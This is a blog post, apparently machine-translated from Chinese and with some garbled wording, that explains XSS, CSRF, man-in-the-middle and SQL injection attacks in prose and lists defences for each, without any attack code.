This is the third day of my participation in the First Challenge 2022

XSS

XSS stands for Cross Site Scripting. XSS refers to a method by which hackers inject malicious scripts into HTML files or DOM to attack users when they browse the page.

These operations generally do the following:

  1. To stealCookie
  2. Monitor user behavior, such as entering the account password and sending it directly to the hacker server
  3. Modify DOM forgery login form
  4. Generate floating window ads in the page

XSStype

  • Stored: Attacks are stored on the server. The attack script is inserted in the comment area. If the attack script is stored on the server, all users who see the corresponding comment are attacked.
  • Reflection type: The attacker mixes the script in the URL. The server receives the URL and takes out the malicious code as a parameter, splices it into HTML and returns it. The browser parses the HTML and executes the malicious code.
  • DOM type: The attack script is written in the URL to induce the user to click the URL. If the URL is parsed, the attack script will be run. The main difference is that DOM attacks do not go through the server.

How to preventXSS

  • Input inspection: For the inputscriptand<iframe>Such labels are escaped or filtered
  • Set up thehttpOnly: a lot ofXSSThe target is to steal userscookieThis property prevents forged identity authenticationJSTo obtaincookie
  • openCSPThe implementation of this security policy is based on a security policy calledContent-Security-PolicytheHTTPFirst). Prevents resources that are not on the whitelist from loading and running

CSRF

CSRF attack cross-site Request Forgery. It uses the user’s logged in identity to complete illegal operations in the user’s name without the user’s knowledge.

How to triggerCSRF

  • In the picture embedded malicious URL, when the user visits the picture, the browser will automatically initiate a request to the malicious URL.
  • The form is automatically submitted after the page is accessed, which is equivalent to simulating the user to complete a POST operation and carrying the user’s cookie information. Let the server mistakenly think is a normal user in the operation, so that all kinds of malicious operations become possible.
  • Inducing the user to click, sending the request, while carrying the user’s cookie information.

Prevention strategies

For CSRF attacks, the hacker can only use the victim’s cookie to win the trust of the server. But the hacker has no way of knowing the contents of the cookie. In addition to the information returned by the server, the hacker is also unable to parse.

  • validationToken: The server returns one when the browser requests ittoken, each request should be accompaniedtokenandcookieBefore it is considered a legitimate request
  • validationReferer: passes the validation request headerRefererTo verify the source site, but the request header is easy to forge
  • Set up theSameSiteSet:cookieSameSite, can letcookieNot issued with cross-site requests, but browser compatibility varies
  • Server AddingX-Frame-OptionsResponse header: This oneHTTPThe response header is for defensive useiframeNested clickjacking attacks. This prevents the browser from rendering the embedded web page
  • Sensitive operations use more complex steps, such as entering a captcha

Man-in-the-middle attack

concept

Man-in-the-middle attack (MITM attack) : An attacker creates an independent connection with the two ends of the communication and exchanges the data they receive. The two ends of the communication think they are talking to each other directly through a private connection, but in fact the whole conversation is completely controlled by the attacker. In a man-in-the-middle attack, an attacker intercepts a conversation between two communicating parties and inserts new content.

Summary: A request or response in transit is intercepted and tampered with by an attacker

A man-in-the-middle attack is a (lack of) mutual authentication attack. Occupying the communication channel between two participants is the core of man-in-the-middle attack.

Most encryption protocols incorporate special authentication methods to prevent man-in-the-middle attacks. For example, the SSL protocol can verify that the certificates used by one or both parties participating in the communication are issued by an authoritative trusted digital certificate authority and can perform bidirectional authentication.

Attack process

  1. The client sends a request to the server and the request is intercepted by an intermediary.
  2. The server sends the public key to the client.
  3. The middleman intercepts the public key and keeps it for himself. Then generate a forged public key and send it to the client.
  4. After receiving the forged public key, the client generates an encrypted hash value and sends it to the server.
  5. The middleman gets the encrypted hash value and decrypts the real secret key with his own private key. Generates a fake encrypted hash value and sends it to the server.
  6. The server decrypts the private key to obtain the fake key. The encrypted data is then transmitted to the client.

Attack types

  1. Wi-fi spoofing: An attacker can create a fake Wi-Fi access point with the same name as the local free Wi-Fi option. For example, an attacker might mimic a Wi-Fi name or create a fake option called “Guest Wi-Fi” or something similar. Once connected to a malicious access point, an attacker can monitor your online activity.

  2. HTTPS spoofing: Attackers trick your browser into believing that you are using a trusted site, thereby redirecting your traffic to an insecure site. When you enter credentials, an attacker steals them.

  3. SSL hijacking: When you try to connect to an insecure HTTP site, the browser can redirect you to the secure HTTPS option. But an attacker could hijack the redirection process, putting links to its servers in the middle and stealing your data and any credentials you enter.

  4. DNS spoofing: The domain name system helps you navigate the Internet by changing urls in the address bar from human-readable text to computer-readable IP addresses. DNS spoofing then forces your browser to access specific addresses under the attacker’s control.

  5. Email hijacking: If an attacker has access to the mailbox of a trusted institution, such as a bank, or even an email server, they can intercept customer emails containing sensitive information and even start sending emails as the institution itself.

How do I prevent man-in-the-middle attacks

  1. Use HTTPS: Make sure every site you visit uses HTTPS.
  2. Don’t ignore the warnings: If your browser tells you there’s a problem with the site you’re visiting, trust it. Security certificate warnings can be the difference between granting credentials to an attacker and remaining secure.
  3. Don’t use public Wi-Fi: Don’t use public Wi-Fi. Sometimes, using public Wi-Fi is unavoidable. If you must use a public Wi-Fi connection, download and install a VPN to add some security to your connection. Also, pay attention to browser security warnings when using a public Wi-Fi connection. A sudden increase in the number of browser alerts could indicate a MITM attack or vulnerability.
  4. Run and update antivirus software: Make sure antivirus software is up to date.

SQLInjection principle and prevention

SQLPrinciple of injection

By inserting SQL commands into Web form submissions or entering query strings for domain names or page requests, the server is eventually tricked into executing malicious SQL commands. Specifically, it takes advantage of an existing application’s ability to inject (malicious) SQL commands into the back-end database engine to execute them. It can get a database on a vulnerable website by typing (malicious) SQL statements into a Web form, rather than executing the SQL statements intended by the designer.

To prevent injection

  • Never trust user input. To verify user input, use regular expressions, limit length, and convert single quotes to double “-“.
  • Never use dynamically assembled SQL, instead use parameterized SQL or use stored procedures directly for data query access.
  • Never use database connections with administrator privileges. Use separate, limited database connections for each application.
  • Do not store confidential information in plain text. Encrypt or hash out passwords and sensitive information.
  • Application exception information should provide as little information as possible. It is better to use custom error information to wrap the original error information and store the exception information in a separate table.

Reference article:

Illustrated HTTP

New.qq.com/omn/2021022…

What is a man-in-the-middle attack